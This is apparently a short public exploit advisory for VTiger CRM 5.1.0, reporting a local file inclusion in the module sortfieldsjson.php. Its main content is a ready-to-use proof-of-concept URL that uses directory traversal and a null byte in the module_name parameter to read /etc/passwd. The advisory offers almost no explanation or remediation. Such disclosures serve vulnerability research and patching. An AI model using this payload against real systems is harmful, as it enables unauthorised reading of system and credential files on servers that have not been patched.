14 lines
No EOL
506 B
Text
14 lines
No EOL
506 B
Text
# Exploit Title: VTiger CRM
|
|
# Google Dork: None
|
|
# Date: 20/03/2012
|
|
# Author: Pi3rrot
|
|
# Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
|
|
# Version: 5.1.0
|
|
# Tested on: CentOS 6
|
|
# CVE : none
|
|
|
|
We have find this vulnerabilitie in VTiger 5.1.0
|
|
In this example, you can see a Local file Inclusion in the file sortfieldsjson.php
|
|
|
|
Try this :
|
|
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00 |